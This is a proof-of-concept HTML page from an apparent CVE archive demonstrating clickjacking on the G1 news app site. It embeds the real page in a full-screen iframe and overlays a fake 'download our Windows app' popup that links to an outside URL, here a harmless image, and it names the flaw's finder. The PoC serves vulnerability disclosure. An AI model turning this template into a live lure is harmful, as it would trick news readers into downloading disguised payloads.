4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / index.html HTML

<!DOCTYPE html>
<html lang="pt">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>App do G1 - Veja como baixar o aplicativo de noticias</title>
    <script type="text/javascript" src="https://gc.kis.v2.scr.kaspersky-labs.com/FD126C42-EBFA-4E12-B309-BB3FDD723AC1/main.js?attr=FKh7opL7OQyTipJDamVS7_GVpSGsDb7CW5YtGfbDNc2XiOax71_XE-xG5HuI57z86q0EmPt-oJAV5maNlLfENEsQj-zU2bV5XPoDh82oWdU" charset="UTF-8"></script><style>
        * {
            margin: 0;
            padding: 0;
            border: 0;
            overflow: hidden;
            font-family: Arial, sans-serif;
        }
        html, body {
            width: 100%;
            height: 100%;
        }
        iframe {
            width: 100vw;
            height: 100vh;
            border: none;
            position: absolute;
            top: 0;
            left: 0;
            z-index: 1;
        }
        .popup {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background: white;
            padding: 30px;
            box-shadow: 0 0 15px rgba(0, 0, 0, 0.6);
            z-index: 3;
            width: 400px;
            text-align: center;
            border-radius: 10px;
        }
        .popup-header {
            background: red;
            color: white;
            font-size: 18px;
            font-weight: bold;
            padding: 15px;
            border-radius: 10px 10px 0 0;
        }
        .popup-content {
            padding: 20px;
            font-size: 16px;
            color: #333;
        }
        .popup button {
            background: red;
            color: white;
            border: none;
            padding: 10px 20px;
            font-size: 16px;
            cursor: pointer;
            border-radius: 5px;
            margin-top: 10px;
        }
        .popup button:hover {
            background: darkred;
        }
    </style>
</head>
<body>
    <iframe src="https://especiais.g1.globo.com/app-g1/index.html" allowfullscreen></iframe>
    <div class="popup" id="popup">
        <div class="popup-header">Baixe nosso novo App para Windows!</div>
        <div class="popup-content">
            <p>Tenha acesso rápido e fácil às notícias diretamente do seu desktop! <p> Falha de Clickjacking ecnontrada por:<p> João. C.</p>
            <button onclick="window.location.href='https://blogdodudu.com.br/wp-content/uploads/2023/12/Hackers-do-dia-a-dia-Capa-1024x680.jpg'">Download</button>
        </div>
    </div>
    <script>
        function showPopup() {
            document.getElementById('popup').style.display = 'block';
        }
        function hidePopup() {
            document.getElementById('popup').style.display = 'none';
        }
        setTimeout(showPopup, 2000); // Mostra o popup após 5 segundos
    </script>
</body>
</html>